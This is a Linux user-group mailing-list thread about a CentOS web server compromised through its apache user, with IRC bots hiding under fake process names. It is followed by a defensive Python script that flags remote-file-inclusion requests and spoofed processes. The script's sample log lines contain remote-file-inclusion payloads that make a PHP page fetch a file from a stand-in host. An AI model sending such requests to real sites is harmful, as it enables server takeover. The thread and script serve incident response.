Mihai Voica wrote:
Sorry for the line wrapping, but I pasted this in. Can anyone give me an idea where
this thing comes from and how I can fix it without a reinstall? The server was
installed by someone else; in theory only httpd is a public service, and it looks
like that is where the hole is. Distro: CentOS 4.6
[EMAIL PROTECTED] netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 11437/vsftpd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 11453/sendmail: acc
tcp 0 0 192.168.100.10:55031 69.42.218.68:6667 ESTABLISHED 5763/ssh
tcp 0 0 192.168.100.10:39788 69.42.218.68:6667 ESTABLISHED 5660/ssh
tcp 0 0 :::80 :::* LISTEN 5660/ssh
tcp 0 0 :::22
Nice. I would start by studying the access logs. Somewhere you will probably
find something like "=http://blablabla". In other words you have (I repeat,
probably) a remote file inclusion in some script, meaning it accepts anything
as a parameter, and since PHP is a clever boy it will happily open files, web
pages & so on for you. Fix that problem and wait for more to show up (it is
well known that once you fix one problem, 100 more appear).
(see ssh on port 80 and the ESTABLISHED connections)
[EMAIL PROTECTED] ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1692 612 ? Ss Jan18 0:00 init [3]
apache 5656 0.0 0.0 0 0 ? Z 03:43 0:00 [sh] <defunct>
apache 5660 99.9 0.1 4948 3012 ? R 03:43 431:51 ssh
apache 5759 0.0 0.0 0 0 ? Z 03:51 0:00 [sh] <defunct>
apache 5763 99.9 0.1 4944 3008 ? R 03:51 423:32 ssh
root 11415 0.0 0.0 1596 544 ? Ss Jan18 0:00 syslogd -m 0
root 11425 0.0 0.0 4064 1140 ? Ss Jan18 0:00 /usr/sbin/sshd
root 11437 0.0 0.0 3780 1012 ? S Jan18 0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
root 11453 0.0 0.0 7340 1824 ? Ss Jan18 0:00 sendmail: accepting connections
smmsp 11462 0.0 0.0 6488 1636 ? Ss Jan18 0:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root 11480 0.0 0.3 19748 6372 ? Ss Jan18 0:00 /usr/sbin/httpd
apache 11487 0.0 0.2 19888 4940 ? S Jan18 0:00 /usr/sbin/httpd
apache 11488 0.0 0.2 19992 5324 ? S Jan18 0:00 /usr/sbin/httpd
apache 11489 0.0 0.2 19996 5180 ? S Jan18 0:00 /usr/sbin/httpd
apache 11490 0.0 0.2 19888 4940 ? S Jan18 0:00 /usr/sbin/httpd
apache 11491 0.0 0.2 19868 4632 ? S Jan18 0:00 /usr/sbin/httpd
apache 11492 0.0 0.2 19864 4996 ? S Jan18 0:00 /usr/sbin/httpd
apache 11493 0.0 0.2 20000 5284 ? S Jan18 0:00 /usr/sbin/httpd
apache 11494 0.0 0.2 19888 4624 ? S Jan18 0:00 /usr/sbin/httpd
apache 22409 0.0 0.1 19748 3712 ? S 10:20 0:00 /usr/sbin/httpd
root 23993 0.0 0.0 1856 308 ? Ss 10:26 0:00 vzctl: pts/0
root 23994 0.0 0.0 2216 1276 pts/0 Ss 10:26 0:00 -bash
root 25831 0.0 0.0 2372 756 pts/0 R+ 10:55 0:00 ps aux
apache 30358 0.0 0.2 19888 4612 ? S 01:05 0:00 /usr/sbin/httpd
It is good that the planted processes run as apache. That means most likely
the whole system was not compromised, only the apache user. If that is the
case, see the step above and then check every directory the apache user has
write access to. Most likely what you are looking for will be in /tmp or
/var/tmp (ls -la is your friend; watch out for directories named " " (space),
"..." and the like).
(see the 2 processes at 99%)
[EMAIL PROTECTED] top -b -n1
top - 11:03:12 up 15:50, 0 users, load average: 2.00, 2.00, 2.00
Tasks: 24 total, 3 running, 19 sleeping, 0 stopped, 2 zombie
Cpu(s): 10.9% us, 1.5% sy, 0.0% ni, 87.6% id, 0.1% wa, 0.0% hi, 0.0% si
Mem: 2067756k total, 2007924k used, 59832k free, 211024k buffers
Swap: 2031608k total, 72k used, 2031536k free, 825952k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
5660 apache 25 0 4948 3012 1244 R 99.6 0.1 439:43.42 perl
5763 apache 25 0 4944 3008 1248 R 97.6 0.1 431:24.66 perl
1 root 15 0 1692 612 528 S 0.0 0.0 0:00.10 init
5656 apache 16 0 0 0 0 Z 0.0 0.0 0:00.00 sh <defunct>
5759 apache 16 0 0 0 0 Z 0.0 0.0 0:00.00 sh <defunct>
11415 root 23 0 1596 544 456 S 0.0 0.0 0:00.02 syslogd
11425 root 20 0 4064 1140 836 S 0.0 0.1 0:00.06 sshd
11437 root 18 0 3780 1012 772 S 0.0 0.0 0:00.00 vsftpd
11453 root 18 0 7340 1824 864 S 0.0 0.1 0:00.01 sendmail
11462 smmsp 15 0 6488 1636 820 S 0.0 0.1 0:00.00 sendmail
11480 root 18 0 19748 6372 3960 S 0.0 0.3 0:00.07 httpd
11487 apache 15 0 19888 4940 2352 S 0.0 0.2 0:00.15 httpd
11488 apache 15 0 19992 5324 2676 S 0.0 0.3 0:00.13 httpd
11489 apache 15 0 19996 5180 2544 S 0.0 0.3 0:00.10 httpd
11490 apache 15 0 19888 4940 2352 S 0.0 0.2 0:00.11 httpd
11491 apache 18 0 19868 4632 2040 S 0.0 0.2 0:00.11 httpd
11492 apache 18 0 19864 4996 2384 S 0.0 0.2 0:00.14 httpd
11493 apache 15 0 20000 5284 2624 S 0.0 0.3 0:00.14 httpd
11494 apache 18 0 19888 4624 2056 S 0.0 0.2 0:00.12 httpd
22409 apache 19 0 19748 3712 1260 S 0.0 0.2 0:00.00 httpd
23993 root 15 0 1856 308 208 S 0.0 0.0 0:00.19 vzctl
23994 root 16 0 2216 1276 1052 S 0.0 0.1 0:00.12 bash
26044 root 15 0 1944 856 684 R 0.0 0.0 0:00.00 top
30358 apache 16 0 19888 4612 2036 S 0.0 0.2 0:00.02 httpd
(see the first 2 processes)
I tried everything I could short of a reinstall (updates, audit), but the web
server had to be back up quickly, so I started it again and planned to
investigate the next day.
The next day ... again:
[EMAIL PROTECTED] ~]# netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 11418/vsftpd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 11434/sendmail: acc
tcp 0 0 192.168.100.10:43745 64.89.27.36:36969 ESTABLISHED 23626/httpsd -i eth
tcp 0 0 :::80 :::* LISTEN 11454/httpd
tcp 0 0 ::ffff:192.168.100.10:80 ::ffff:192.168.100.5:48596 TIME_WAIT -
Merry Christmas, you got owned a second time. This toy is a bit smarter. In C
you can change the name a process shows by overwriting ARGV[0] (in other
languages too, I know, but psyBNCs and whatever else is used for IRC are
generally written in C).
(see httpsd)
[EMAIL PROTECTED] ~]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 1704 608 ? Ss Jan19 0:00 init [3]
root 11408 0.0 0.2 1608 528 ? Ss Jan19 0:00 syslogd -m 0
root 11418 0.0 0.5 3812 1000 ? S Jan19 0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
root 11434 0.0 0.9 7380 1844 ? Ss Jan19 0:00 sendmail: accepting connections
smmsp 11443 0.0 0.8 6528 1644 ? Ss Jan19 0:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root 11454 0.0 3.2 19688 6328 ? Ss Jan19 0:00 /usr/sbin/httpd
root 11463 0.0 0.4 2492 904 ? Ss Jan19 0:00 crond
apache 23626 99.9 1.2 5220 2520 ? R 10:04 15:00 /usr/sbin/httpsd -i eth0
apache 23640 0.0 2.2 19784 4412 ? S 10:04 0:00 /usr/sbin/httpd
apache 23641 0.0 2.3 19820 4592 ? S 10:04 0:00 /usr/sbin/httpd
apache 23642 0.0 2.2 19784 4404 ? S 10:04 0:00 /usr/sbin/httpd
apache 23645 0.0 2.2 19784 4384 ? S 10:04 0:00 /usr/sbin/httpd
apache 23646 0.0 2.2 19784 4396 ? S 10:04 0:00 /usr/sbin/httpd
apache 23647 0.0 2.2 19792 4404 ? S 10:04 0:00 /usr/sbin/httpd
apache 23648 0.0 2.2 19784 4384 ? S 10:04 0:00 /usr/sbin/httpd
root 24563 0.0 0.2 1852 424 ? Ss 10:11 0:00 vzctl: pts/0
root 24564 0.0 0.6 2228 1292 pts/0 Ss 10:11 0:00 -bash
root 26192 0.0 0.3 2388 776 pts/0 R+ 10:19 0:00 ps aux
(the file /usr/sbin/httpsd does not exist)
[EMAIL PROTECTED] ~]# top -b -n1
top - 10:20:39 up 1 day, 20:22, 0 users, load average: 1.00, 1.00, 1.04
Tasks: 18 total, 2 running, 16 sleeping, 0 stopped, 0 zombie
Cpu(s): 4.2% us, 0.7% sy, 0.0% ni, 95.1% id, 0.0% wa, 0.0% hi, 0.0% si
Mem: 196608k total, 37300k used, 159308k free, 0k buffers
Swap: 0k total, 0k used, 0k free, 0k cached
PID USER PR NI %CPU TIME+ %MEM VIRT RES SHR S COMMAND
23626 apache 25 0 100 16:04.06 1.3 5220 2520 576 R perl
1 root 18 0 0 0:00.05 0.3 1704 608 524 S init
11408 root 15 0 0 0:00.01 0.3 1608 528 440 S syslogd
11418 root 18 0 0 0:00.00 0.5 3812 1000 772 S vsftpd
11434 root 18 0 0 0:00.04 0.9 7380 1844 872 S sendmail
11443 smmsp 18 0 0 0:00.01 0.8 6528 1644 828 S sendmail
11454 root 18 0 0 0:00.22 3.2 19688 6328 3928 S httpd
11463 root 23 0 0 0:00.00 0.5 2492 904 524 S crond
23640 apache 18 0 0 0:00.00 2.2 19784 4412 1900 S httpd
23641 apache 19 0 0 0:00.00 2.3 19820 4592 2036 S httpd
23642 apache 18 0 0 0:00.00 2.2 19784 4404 1884 S httpd
23645 apache 19 0 0 0:00.00 2.2 19784 4384 1872 S httpd
23646 apache 15 0 0 0:00.00 2.2 19784 4396 1872 S httpd
23647 apache 18 0 0 0:00.02 2.2 19792 4404 1892 S httpd
23648 apache 15 0 0 0:00.00 2.2 19784 4384 1872 S httpd
24563 root 15 0 0 0:00.01 0.2 1852 424 316 S vzctl
24564 root 15 0 0 0:00.04 0.7 2228 1292 1068 S bash
26292 root 15 0 0 0:00.00 0.4 1960 868 696 R top
Does anyone know how this could have been done and how I fix it?
Thanks in advance.
Again: study the logs and look for what I wrote above.
Regards,
Radu Oprisan
_______________________________________________
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug
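The two checks the reply above recommends, written out as an added example (this is not code from the thread or from either poster). The first scans Apache combined-format access-log lines for a query parameter whose value is itself a URL, the "=http://..." remote-file-inclusion pattern, including the %-encoded form. The second compares what each process claims in argv[0] (what `ps aux` prints) with the kernel's own record, the comm field (what `top` prints) and the /proc/<pid>/exe link, and checks that a claimed absolute path exists on disk; that is exactly how a perl bot that renamed itself shows up as "/usr/sbin/httpsd" in ps, "perl" in top, and no such file on disk. The log lines and process records are constructed for the example and only modeled on the listings above: the IPs, file names and user agents are made up, 203.0.113.7 is a documentation address, and uid 48 is the apache user on CentOS. Function and variable names are the example's own.

```python
#!/usr/bin/env python3
"""Triage helpers for a web server compromised through its apache user.

find_rfi              flag access-log requests that pass a URL as a parameter value
suspicious_processes  flag processes whose argv[0] contradicts comm / the exe link,
                      claims a path that is not on disk, or runs a deleted binary
read_procs            collect live records from /proc (Linux; root to read every exe link)
"""
import os
import re
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
URL_VALUE_RE = re.compile(r'^(https?|ftp)://', re.I)


def find_rfi(lines):
    """Return (client_ip, request_target, parameter) for each request that passes a
    URL as a parameter value.  parse_qsl undoes %-encoding, so the evasive
    "page=http%3A%2F%2F..." form is caught along with the literal one."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for key, value in parse_qsl(urlsplit(m['target']).query, keep_blank_values=True):
            if URL_VALUE_RE.match(value.strip()):
                hits.append((m['ip'], m['target'], key))
                break
    return hits


def read_procs():
    """Live records: pid, uid, kernel comm, exe link target, argv (all from /proc)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir('/proc')):
        base = f'/proc/{pid}'
        try:
            stat = open(f'{base}/stat').read()
            comm = stat[stat.index('(') + 1:stat.rindex(')')]      # comm may contain spaces
            argv = [a.decode(errors='replace')
                    for a in open(f'{base}/cmdline', 'rb').read().split(b'\0') if a]
            uid = int(next(l for l in open(f'{base}/status') if l.startswith('Uid:')).split()[1])
            try:
                exe = os.readlink(f'{base}/exe')
            except OSError:
                exe = ''                                              # kernel thread, or not root
        except (OSError, ValueError, StopIteration):
            continue                                                  # process exited under us
        procs.append({'pid': int(pid), 'uid': uid, 'comm': comm, 'exe': exe, 'argv': argv})
    return procs


def suspicious_processes(procs, path_exists=os.path.exists):
    """Return (pid, uid, [reasons]) for processes whose argv[0] disagrees with the
    kernel.  path_exists is injectable so records copied from another host work."""
    findings = []
    for p in procs:
        if not p['argv']:
            continue                                   # zombie or kernel thread: empty cmdline
        words = p['argv'][0].split()
        claimed = words[0] if words else ''            # "sendmail: accepting connections" -> "sendmail:"
        name = os.path.basename(claimed).lstrip('-')   # "-bash" is a login shell, not a disguise
        deleted = p['exe'].endswith(' (deleted)')
        exe_path = p['exe'][:-len(' (deleted)')] if deleted else p['exe']
        reasons = []
        # comm is the executable's basename cut to 15 chars; a shebang script gets the
        # script's name as comm, so the exe link is consulted before calling it a lie.
        if not (name.startswith(p['comm']) or name == os.path.basename(exe_path)):
            reasons.append(f"argv[0] says {claimed!r} but the kernel runs {p['comm']!r} ({exe_path or '?'})")
        if claimed.startswith('/') and not path_exists(claimed):
            reasons.append(f'{claimed} does not exist on disk')
        if deleted:
            reasons.append(f'{exe_path} was unlinked after it started')
        if reasons:
            findings.append((p['pid'], p['uid'], reasons))
    return findings


# Constructed sample data, modeled on (not copied from) the listings in the thread.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jan/2008:03:42:59 +0200] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Jan/2008:03:43:07 +0200] "GET /index.php?page=http://203.0.113.7/x.txt? HTTP/1.1" 200 128 "-" "libwww-perl/5.805"',
    '10.0.0.9 - - [18/Jan/2008:03:51:02 +0200] "GET /gallery.php?img=ftp%3A%2F%2F203.0.113.7%2Fr57.txt HTTP/1.1" 200 97 "-" "Mozilla/4.0"',
    '10.0.0.5 - - [18/Jan/2008:03:51:30 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]
SAMPLE_PROCS = [
    {'pid': 11454, 'uid': 0,  'comm': 'httpd',    'exe': '/usr/sbin/httpd',    'argv': ['/usr/sbin/httpd']},
    {'pid': 11434, 'uid': 0,  'comm': 'sendmail', 'exe': '/usr/sbin/sendmail', 'argv': ['sendmail: accepting connections']},
    {'pid': 24564, 'uid': 0,  'comm': 'bash',     'exe': '/bin/bash',          'argv': ['-bash']},
    {'pid': 23626, 'uid': 48, 'comm': 'perl',     'exe': '/usr/bin/perl',      'argv': ['/usr/sbin/httpsd', '-i', 'eth0']},
    {'pid': 23700, 'uid': 48, 'comm': 'bot',      'exe': '/tmp/ .../bot (deleted)', 'argv': ['sh']},
]
ON_DISK = {'/usr/sbin/httpd', '/usr/sbin/sendmail', '/bin/bash', '/usr/bin/perl'}.__contains__

if __name__ == '__main__':
    for ip, target, key in find_rfi(SAMPLE_LOG):
        print(f'RFI? {ip} sent a URL in parameter {key!r}: {target}')
    for pid, uid, reasons in suspicious_processes(SAMPLE_PROCS, ON_DISK):
        print(f'pid {pid} (uid {uid}): ' + '; '.join(reasons))
    # On the box itself, as root:  suspicious_processes(read_procs())
```

Two caveats when running this for real. find_rfi flags any URL-valued parameter, so a legitimate redirector or feed reader will also show up; sort the hits by script name and look at the response sizes and the user agent before deciding. suspicious_processes reads /proc, which is only as honest as the kernel: that is fine when, as here, the attacker holds the apache user and nothing more, but a root compromise with a kernel rootkit can hide from it, and daemons that set their own name via prctl(PR_SET_NAME) will need whitelisting.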